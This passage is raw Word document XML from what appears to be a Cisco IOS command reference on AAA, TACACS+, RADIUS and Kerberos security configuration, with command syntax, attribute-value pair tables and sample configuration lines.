        <w:t xml:space="preserve">Character string used to name the following list of authentication methods tried when a user logs i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tho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the default list is not set, only the local user database is checked. This command has the same effect as the following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entication ppp default loc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age Guidelin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lists that you create with the aaa authentication ppp command are used with the ppp authentication command. These lists contain up to four authentication methods that are used when a user tries to log in to the serial interfa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reate a list by entering the aaa authentication ppp list-name method command, where list-name is any character string used to name this list (such as MIS-access). The method argument identifies the list of methods that the authentication algorithm tries in the given sequence. You can enter up to four methods. Method keywords are described in Table 5.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additional methods of authentication are only used if the previous method returns an error, not if it fails. Specify none as the final method in the command line to have authentication succeed even if all methods return an erro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authentication is not specifically set for a function, the default is none and no authentication is performed. Use the show running-config command to display lists of authentication metho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ble 5 AAA Authentication PPP Metho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word </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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needed </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Does not authenticate if user has already been authenticated on a TTY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rb5 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses Kerberos 5 for authentication (can only be used for PAP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cal </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the local username database for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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses no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adius </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses RADIUS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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses TACACS+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is command cannot be used with TACACS or extended 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reates an AAA authentication list called MIS-access for serial lines that use PPP. This authentication first tries to contact a TACACS+ server. If this action returns an error, the user is allowed access with no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entication MIS-access ppp tacacs+ n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is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local-overri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new-mod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0] aaa authentication username-promp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change the text displayed when users are prompted to enter a username, use the aaa authentication username-prompt global configuration command. Use the no form of this command to return to the default username prompt tex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username-prompt {text-str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aaa authentication username-prompt {text-str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ext-string </w:t>
        <w:tab/>
        <w:t xml:space="preserve">String of text that will be displayed when the user is prompted to enter a username. If this text-string contains spaces or unusual characters, it must be enclosed in double-quotes (for example, "Enter your nam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is disabled by defaul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aaa authentication username-prompt command to change the default text that the Cisco IOS software displays when prompting a user to enter a username. The no form of this command returns the username prompt to the default valu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ome protocols (for example, TACACS+) have the ability to override the use of local username prompt information. Using the aaa authentication username-prompt command will not change the username prompt text in these instanc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e aaa authentication username-prompt command does not change any dialog that is supplied by a remote TACACS+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hanges the text for the username promp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entication username-prompt "Enter your name he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password-promp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new-mod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password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1] aaa authoriz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aaa authorization global configuration command to set parameters that restrict a user's network access. Use the no form of this command to disable authorization for a func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orization {network | exec | command level} metho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aaa authorization {network | exec | command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etwork </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Runs authorization for all network-related service requests, including SLIP, PPP, PPP NCPs, and ARA protocol.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ec </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Runs authorization to determine if the user is allowed to run an EXEC shell. This facility might return user profile information such as autocommand inform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ommand </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Runs authorization for all commands at the specified privilege level.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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specific command level that should be authorized. Valid entries are 0 through 15.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ethod </w:t>
        <w:tab/>
        <w:t xml:space="preserve">One of the keywords in Table 6.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uthorization is disabled for all actions (equivalent to the keyword no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ere are five commands associated with privilege level 0: disable, enable, exit, help, and logout. If you configure AAA authorization for a privilege level greater than 0, these five commands will not be included in the privilege level command s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aaa authorization command to create at least one, and up to four, authorization methods that can be used when a user accesses the specified func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is command, along with aaa accounting, replaces the tacacs-server suite of commands in previous versions of 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additional methods of authorization are used only if the previous method returns an error, not if it fails. Specify none as the final method in the command line to have authorization succeed even if all methods return an erro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authorization is not specifically set for a function, the default is none and no authorization is perform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ble 6 AAA Authorization Metho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word </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Descrip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 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Requests authorization information from the TACACS+ serve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authenticated </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows the user to access the requested function if the user is authenticat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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">No authorization is perform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cal </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the local database for authoriz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adius </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses RADIUS to get authorization inform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rb5-instance </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the instance defined by the Kerberos instance map comman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authorization command causes a request packet containing a series of attribute value pairs to be sent to the TACACS daemon as part of the authorization process. The daemon can do one of the follow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Accept the request as i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Make changes to the reque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Refuse the request, and hence, refuse authoriz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ble 7 describes attribute value (AV) pairs associated with the aaa authorization command. Registered users can find more information about TACACS+ and attribute pairs on Cisco Connection Online (CC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ttribute </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Description </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Cisco IOS Releas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1.0 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Cisco IOS Release11.1 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Cisco IOS Release11.2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ervice=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The primary service. Specifying a service attribute indicates that this is a request for authorization or accounting of that service. Current values are slip, ppp, arap, shell, tty-daemon, connection, and system. This attribute must always be included. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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rotocol=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">A protocol that is a subset of a service. An example would be any PPP NCP. Currently known values are lcp, ip, ipx, atalk, vines, lat, xremote, tn3270, telnet, rlogin, pad, vpdn, http, and unknown. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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md=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">A shell (EXEC) command. This indicates the command name for a shell command that is to be run. This attribute must be specified if service equals "shell." A NULL value indicates that the shell itself is being referred to. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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md-arg=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">An argument to a shell (EXEC) command. This indicates an argument for the shell command that is to be run. Multiple cmd-arg attributes may be specified, and they are order dependent. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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cl=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ASCII number representing a connection access list. Used only when service=shell. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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acl=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ASCII identifier for an interface input access list. Used with service=ppp and protocol=ip. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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acl#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ASCII access list identifier for an input access list to be installed and applied to an interface for the duration of the current connect ion. Used with service=ppp and protocol=ip, and service service=ppp and protocol =ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.2(4)F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utacl=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ASCII identifier for an interface output access list. Used with service=ppp and protocol=ip, and service service=ppp and protocol=ipx. Contains an IP output access list for SLIP or PPP/IP (for example, outacl=4). The access list itself must be preconfigured on the router. Per-user access lists do not currently work with ISDN interfaces. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes (PPP/IP only)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utacl#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ACSII access list identifier for an interface output access list to be installed and applied to an interface for the duration of the current condition. Used with service=ppp and protocol=ip, and service service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.2(4)F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zonelist=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">A numeric zonelist value. Used with service=arap. Specifies an AppleTalk zonelist for ARA (for example, zonelist=5). </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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ddr=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">A network address. Used with service=slip, service=ppp, and protocol=ip. Contains the IP address that the remote host should use when connecting via SLIP or PPP/IP. For example, addr=1.2.3.4. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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ddr-pool=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies the name of a local pool from which to get the address of the remote host. Used with service=ppp and protocol=i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at addr-pool works in conjunction with local pooling. It specifies the name of a local pool (which must be preconfigured on the network access server). Use the ip-local pool command to declare local pools. For examp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address-pool loca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local pool boo 1.0.0.1 1.0.0.1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local pool moo 2.0.0.1 2.0.0.2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can then use TACACS+ to return addr-pool=boo or addr-pool=moo to indicate the address pool from which you want to get this remote node's address. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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outing=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies whether routing information is to be propagated to, and accepted from this interface. Used with service=slip, service=ppp, and protocol=ip. Equivalent in function to the /routing flag in SLIP and PPP commands. Can either be true or false (for example, routing=true). </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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oute </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies a route to be applied to an interface. Used with service=slip, service=ppp, and protocol=i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uring network authorization, the route attribute can be used to specify a per-user static route, to be installed by TACACS+ as follow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oute=" dst_address mask [ gateway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indicates a temporary static route that is to be applied. dst_address, mask, and gateway are expected to be in the usual dotted-decimal notation, with the same meanings as in the familiar ip route configuration command on a network access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gateway is omitted, the peer's address is the gateway. The route is expunged when the connection terminates. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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oute#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Like the route AV pair, this specifies a route to be applied to an interface, but these routes are numbered, allowing multiple routes to be applied. Used with service=ppp and protocol=ip, and service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.2(4)F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imeout=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The number of minutes before an ARA session disconnects (for example, timeout=60). A value of zero indicates no timeout. Used with service=arap. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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dletime=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sets a value, in minutes, after which an idle session is terminated. Does not work for PPP. A value of zero indicates no timeout. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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utocmd=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies an autocommand to be executed at EXEC startup (for example, autocmd=telnet muruga.com). Used only with service=shell. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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escape=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Prevents user from using an escape character. Used with service=shell. Can be either true or false (for example, noescape=true). </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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hangup=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Used with service=shell. Specifies the nohangup option. Can be either true or false (for example, nohangup=false). </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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riv-lvl=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Privilege level to be assigned for the EXEC. Used with service=shell. Privilege levels range from 0 to 15, with 15 being the highest. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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llback-dialstring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sets the telephone number for a callback (for example: callback-dialstring=408-555-1212). Value is NULL, or a dial-string. A NULL value indicates that the service may choose to get the dialstring through other means. Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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llback-line </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The number of a TTY line to use for callback (for example: callback-line=4). Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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llback-rotary </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The number of a rotary group (between 0 and 100 inclusive) to use for callback (for example: callback-rotary=34). Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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callback-verify </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Indicates that no callback verification is required. The only valid value for this parameter is 1 (for example, nocallback-verify=1). Used with service=arap, service=slip, service=ppp, service=shell. There is no authentication on callback. Not valid for ISDN. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes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unnel-id </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies the username that will be used to authenticate the tunnel over which the individual user MID will be projected. This is analogous to the remote name in the vpdn outgoing command. Used with service=ppp and protocol=vpdn. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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addresses </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Space-separated list of possible IP addresses that can be used for the end-point of a tunnel. Used with service=ppp and protocol=vpdn. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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as-password </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies the password for the network access server during the L2F tunnel authentication. Used with service=ppp and protocol=vpdn. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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w-password </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies the password for the home gateway during the L2F tunnel authentication. Used with service=ppp and protocol=vpdn. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no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te-ftr-in#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies an input access list definition to be installed and applied to routing updates on the current interface for the duration of the current connection. Used with service=ppp and protocol=ip, and with service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.2(4)F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te-ftr-out#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies an output access list definition to be installed and applied to routing updates on the current interface for the duration of the current connection. Used with service=ppp and protocol=ip, and with service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes 11.2(4)F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ap#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies static Service Advertising Protocol (SAP) entries to be installed for the duration of a connection. Used with service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes 11.2(4)F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ap-fltr-in#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies an input SAP filter access list definition to be installed and applied on the current interface for the duration of the current connection. Used with service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">yes 11.2(4)F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ap-fltr-out#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies an output SAP filter access list definition to be installed and applied on the current interface for the duration of the current connection. Used with service=ppp and protocol=ipx. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.2(4)F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ool-def#&lt;n&gt; </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Used to define IP address pools on the network access server. Used with service=ppp and protocol=ip. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">11.2(4)F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ource-ip=x </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Used as the source IP address of all VPDN packets generated as part of a VPDN tunnel. This is equivalent to the Cisco vpdn outgoing global configuration command. </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">no </w:t>
        <w:tab/>
        <w:t xml:space="preserve">y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that TACACS+ authorization is used for all network-related requests. If this authorization method returns an error (if the TACACS+ server cannot be contacted), no authorization is performed and the request succee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orization network tacacs+ n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that TACACS+ authorization is run for level 15 commands. If this authorization method returns an error (that is, if the TACACS+ server cannot be contacted), no authorization is performed and the request succee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orization command 15 tacacs+ n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ccounting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new-mod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2] aaa authorization config-comma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disable AAA configuration command authorization in the EXEC mode, use the no form of the aaa authorization config-commands global configuration command. Use the standard form of this command to reestablish the default created when the aaa authorization command level method command was issu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orization config-comma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aaa authorization config-comma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fter the aaa authorization command level method has been issued, this command is enabled by default---meaning that all configuration commands in the EXEC mode will be authoriz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aaa authorization command level method is enabled, all commands, including configuration commands, are authorized by AAA using the method specified. Because there are configuration commands that are identical to some EXEC-level commands, there can be some confusion in the authorization process. Using no aaa authorization config-commands stops the network access server not from attempting configuration command authoriz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nce the no form of this command has been issued, AAA authorization of configuration commands is completely disabled. Care should be taken before issuing the no form of this command because it potentially reduces the amount of administrative control on configuration comma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aaa authorization config-commands command if, after using the no form of this command, you need to reestablish the default set by the aaa authorization command level method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that TACACS+ authorization is run for level 15 commands and that AAA authorization of configuration commands is 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new-mode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authorization command 15 tacacs+ n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 aaa authorization config-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oriz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3] aaa new-mod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the AAA access control model, issue the aaa new-model global configuration command. Use the no form of this command to disable this functionalit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new-mod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aaa new-mod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is not en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enables the AAA access control system and TACACS+. If you initialize AAA functionality and later decide to use TACACS or extended TACACS, issue the no version of this command before you enable the version of TACACS that you want to us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fter enabling AAA/TACACS+ with the aaa new-model command, you must use the tacacs-server key command to set the authentication key used in all TACACS+ communications with the TACACS+ daem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initializes AAA and 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a new-mode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ccounting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ara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enable defaul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local-overri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logi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pp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oriz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4] ara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AAA authentication for ARA on a line, use the arap authentication line configuration command. Use the no form of the command to disable authentication for an ARA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rap authentication {default | list-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arap authentication {default | list-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ution If you use a list-name value that was not configured with the aaa authentication arap command, ARA protocol will be disabled on this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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Default list created with the aaa authentication arap comman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st-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Indicated list created with the aaa authentication arap comman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RA protocol authentication uses the default set with aaa authentication arap command. If no default is set, the local user database is check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ne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is a per-line command that specifies the name of a list of AAA authentication methods to try at login. If no list is specified, the default list is used (whether or not it is specified in the command line). You create defaults and lists with the aaa authentication arap command. Entering the no version of arap authentication has the same effect as entering the command with the default argume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Before issuing this command, create a list of authentication processes by using the aaa authentication arap global configuration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that the TACACS+ authentication list called MIS-access is used on ARA line 7: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ine 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rap authentication MIS-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ara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5] clear kerberos cre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clear kerberos creds EXEC command to delete the contents of your credentials cach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lear kerberos cre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keywords or argumen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redentials are cleared when the user logs o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isco supports Kerberos 5.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illustrates the clear kerberos creds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isco-2500&gt; show kerberos cre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 Principal: chet@cisco.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id Starting          Expires                 Service Princip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8-Dec-1995 16:21:07    19-Dec-1995 00:22:24    krbtgt/CISCO.COM@CISCO.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isco-2500&gt; clear kerberos cre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isco-2500&gt; show kerberos cre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 Kerberos credenti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isco-2500&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how kerberos cre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6] enable last-resor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specify what happens if the TACACS and extended TACACS servers used by the enable command do not respond, use the enable last-resort global configuration command. Use the no form of this command to restore the defaul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last-resort {password | succe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enable last-resort {password | succe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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows you to enter enable mode by entering the privileged command level password. A password must contain from 1 to 25 uppercase and lowercase alphanumeric character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ucceed </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Allows you to enter enable mode without further ques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ccess to enable mode is deni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secondary authentication is used only if the first attempt fail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is command is not used in AAA/TACACS+, which uses the aaa authentication suite of commands instea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if the TACACS servers do not respond to the enable command, the user can enable by entering the privileged level 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 last-resort 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7] enable use-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use of the TACACS to determine whether a user can access the privileged command level, use the enable use-tacacs global configuration command. Use the no form of this command to disable TACACS verif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use-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enable use-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ution If you use the enable use-tacacs command, you must also use the tacacs-server authenticate enable command, or you will be locked out of the privileged command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you add this command to the configuration file, the EXEC enable command prompts for a new username and password pair. This pair is then passed to the TACACS server for authentication. If you are using extended TACACS, it also passes any existing UNIX user identification code to the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is command initializes TACACS. Use the tacacs server-extended command to initialize extended TACACS, or use the aaa new-model command to initialize AAA/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ets TACACS verification on the privileged EXEC-level login sequen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 use-tacac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cacs-server authenticate en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authenticate enabl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8] ip radius source-interfa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ip radius source-interface global configuration command to force RADIUS to use the IP address of a specified interface for all outgoing RADIUS packets. Use the no form of this command to disable use of a specified interface IP addr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radius source-interface subinterface-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ip radius source-interfa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ubinterface-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of the interface that RADIUS uses for all of its outgoing packet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factory-assigned defaul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is command to set a subinterface's IP address to be used as the source address for all outgoing RADIUS packets. This address is used as long as the interface is in the up state. In this way, the RADIUS server can use one IP address entry for every network access client instead of maintaining a list of IP address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is especially useful in cases where the router has many interfaces, and you want to ensure that all RADIUS packets from a particular router have the same IP addr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specified interface must have an IP address associated with it. If the specified subinterface does not have an IP address or is in a down state, then RADIUS reverts to the default. To avoid this, add an IP address to the subinterface or bring the interface to the up sta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makes RADIUS use the IP address of subinterface s2 for all outgoing RADIUS packe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 radius source-interface s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tacacs source-interfac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telnet source-interfac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tftp source-interfac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3.9] ip tacacs source-interfa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ip tacacs source-interface global configuration command to force TACACS to use the IP address of a specified interface for all outgoing TACACS packets. Use the no form of this command to disable use of a specified interface IP addr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tacacs source-interface subinterface-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ip tacacs source-interfa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ubinterface-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of the interface that TACACS uses for all of its outgoing packet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factory-assigned defaul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is command to set a subinterface's IP address for all outgoing TACACS packets. This address is used as long as the interface is in the up state. In this way, the TACACS server can use one IP address entry associated with the network access client instead of maintaining a list of all IP address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is especially useful in cases where the router has many interfaces, and you want to ensure that all TACACS packets from a particular router have the same IP addr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specified interface must have an IP address associated with it. If the specified subinterface does not have an IP address or is in a down state, TACACS reverts to the default. To avoid this, add an IP address to the subinterface or bring the interface to the up sta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makes TACACS use the IP address of subinterface s2 for all outgoing TACACS (TACACS, extended TACACS, or TACACS+) packe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 tacacs source-interface s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radius source-interfac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telnet source-interfac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tftp source-interfac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0] kerberos clients mandato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kerberos clients mandatory global configuration command to cause the rsh, rcp, rlogin, and telnet commands to fail if they cannot negotiate the Kerberos protocol with the remote server. Use the no form of this command to disable this op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clients mandato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kerberos clients mandato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t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this command is not configured and the user has Kerberos credentials stored locally, the rsh, rcp, rlogin, and telnet commands attempt to negotiate the Kerberos protocol with the remote server and will use the un-Kerberized protocols if unsuccessfu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this command is not configured and the user has no Kerberos credentials, the standard protocols for rcp and rsh are used to negotiate the Keberos protoco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illustrates the kerberos clients mandatory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rberos clients manda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is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opy rcp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credentials forwa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login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sh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elnet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1] kerberos credentials forwa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kerberos credentials forward global configuration command to force all network application clients on the router to forward users' Kerberos credentials upon successful Kerberos authentication. Use the no form of this command to turn off Kerberos credentials forward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credentials forwa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kerberos credentials forwa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credentials forwarding to have users' TGTs forwarded to the host they authenticate to. In this way, users can connect to multiple hosts in the Kerberos realm without running the KINIT program each time they need to get a TG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illustrates the kerberos credentials forward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credentials forwa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opy rcp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login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sh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elnet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2] kerberos instance ma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kerberos instance map global configuration command to map Kerberos instances to Cisco IOS privilege levels. Use the no form of this command to remove a Kerberos instance ma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instance map instance privilege-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kerberos instance map instan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yntax Descrip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stance </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of a Kerberos instanc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rivilege-level </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The privilege level at which a user is set if the user's Kerberos principle contains the matching Kerberos instance. You can specify up to 16 privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileg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rivilege level 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is command to create user instances with access to administrative comma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the privilege level is set to 15 for authenticated Kerberos users with the admin instance in Kerberos realm cisco.co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rberos instance map admin 1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oriz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3] kerberos local-real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kerberos local-realm global configuration command to specify the Kerberos realm in which the router is located. Use the no form of this command to remove the specified Kerberos realm from this rou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local-realm kerberos-real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kerberos local-real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yntax Descrip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realm </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The name of the default Kerberos realm. A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letter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router can be located in more than one realm at a time. However, there can only be one instance of Kerberos local-realm. The realm specified with this command is the default real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illustrates the kerberos local realm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rberos local-realm MURUGA.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preauth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real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rvtab ent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rvtab remo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4] kerberos preauth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kerberos preauth global configuration command to specify a preauthentication method to use to communicate with the KDC. Use the no form of this command to disable Kerberos pre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preauth [encrypted-unix-timestamp | no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kerberos preauth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yntax Descrip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crypted-unix-timestamp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Use an encrypted UNIX timestamp as a quick authentication method when communicating with the KDC.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ne </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Do not use Kerberos pre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t is more secure to use a preauthentication for communications with the KDC. However, communication with the KDC will fail if the KDC does not support this particular version of kerberos preauth. If that happens, turn off the preauthentication with the none op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no form of this command is equivalent to using then none key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illustrates how to enable and disable Kerberos pre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rberos preauth encrypted-unix-timestam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preauth no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local-real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rvtab ent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rvtab remo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5] kerberos real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kerberos realm global configuration command to map a host name or Domain Naming System (DNS) domain to a Kerberos realm. Use the no form of this command to remove a Kerberos realm ma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realm {dns-domain | host} kerberos-real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kerberos realm {dns-domain | host} kerberos-real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yntax Descrip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ns-domain </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of a DNS domain or hos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ost </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of a DNS hos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realm </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of the Kerberos realm the specified domain or host belongs to.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NS domains are specified with a leading dot (.) character; hostnames cannot begin with a dot (.) character. There can be multiple entries of this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Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letters. The router can be located in more than one realm at a time. Kerberos realm names must be in all uppercase characte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illustrates the kerberos realm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rberos realm .muruga.com MURUGA.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rberos realm muruga.com MURUGA.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local-real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rvtab ent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rvtab remo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6] kerberos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kerberos server global configuration command to specify the location of the Kerberos server for a given Kerberos realm. Use the no form of this command to remove a Kerberos server for a specified Kerberos real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erver kerberos-realm {hostname | ip-address} [port-numb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kerberos server kerberos-realm {hostname | ip-addr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yntax Descrip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realm </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of the Kerberos realm. A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letter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ostname </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name of the host functioning as a Kerberos server for the specified Kerberos realm (translated into an IP address at the time of entry).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address </w:t>
        <w:tab/>
        <w:t xml:space="preserve">IP address of the host functioning as a Kerberos server for the specified Kerberos realm.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ort-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Port that the KDC/TGS monitors (defaults to 88).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126.38.47.66 as the Kerberos server for the Kerberos realm MURUGA.CO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rberos server MURUGA.COM 126.38.47.6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local-real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real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rvtab ent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rvtab remo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7] kerberos srvtab ent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kerberos srvtab remote global configuration command (not kerberos srvtab entry) to retrieve a SRVTAB file from a remoe host and automatically generate a Kerberos SRVTAB entry configuration. (The Kerberos SRVTAB entry is the router's locally stored SRVTAB.) Use the no form of this command to remove a SRVTAB entry from the router's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rvtab entry kerberos-principle principle-type timestamp key-version numb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type key-length encrypted-keytab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kerberos srvtab entry kerberos-principle principle-typ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principle </w:t>
        <w:tab/>
        <w:t xml:space="preserve">A service on the route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rinciple-type </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Version of the Kerberos SRVTAB.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imestamp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Number representing the date and time the SRVTAB entry was creat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version number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Version of the encryption key forma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type </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Type of encryption us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length </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Length, in bytes, of the encryption key.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crypted-keytab </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Secret key the router shares with the KDC. It is encrypted with the private Data Encryption Standard (DES) key (if available) when you write out your configur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you use the kerberos srvtab remote command to copy the SRVTAB file from a remote host (generally the KDC), it parses the information in this file and stores it in the router's running configuration in the kerberos srvtab entry format. The key for each SRVTAB entry is encrypted with a private DES key if one is defined on the router. To ensure that the SRVTAB is available (that is, that it does not need to be acquired from the KDC) when you reboot the router, use the write memory router configuration command to write the router's running configuration to NVRA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you reload a configuration, with a SRVTAB encrypted with a private DES key, on to a router that does not have a private DES key defined, the router displays a message informing you that the SRVTAB entry has been corrupted, and discards the ent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you change the private DES key and reload an old version of the router's configuration that contains SRVTAB entries encrypted with the old private DES keys, the router will restore your Kerberos SRVTAB entries, but the SRVTAB keys will be corrupted. In this case, you must delete your old Kerberos SRVTAB entries and reload your Kerberos SRVTABs on to the router using the kerberos srvtab remote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lthough you can configure kerberos srvtab entry on the router manually, generally you would not do this because the keytab is encrypted automatically by the router when you copy the SRVTAB using the kerberos srvtab remote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host/new-router.loki.com@LOKI.COM is the host, 0 is the type, 817680774 is the timestamp, 1 is the version of the key, 1 indicates the DES is the encryption type, 8 is the number of bytes, and .cCN.YoU.okK is the encrypted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rberos srvtab entry host/new-router.loki.com@LOKI.COM 0 817680774 1 1 8 .cCN.YoU.ok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rvtab remo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 config-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8] kerberos srvtab remo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kerberos srvtab remote configuration command to retrieve a krb5 SRVTAB file from the specified ho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rvtab remote {hostname | ip-address} {file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ostname </w:t>
        <w:tab/>
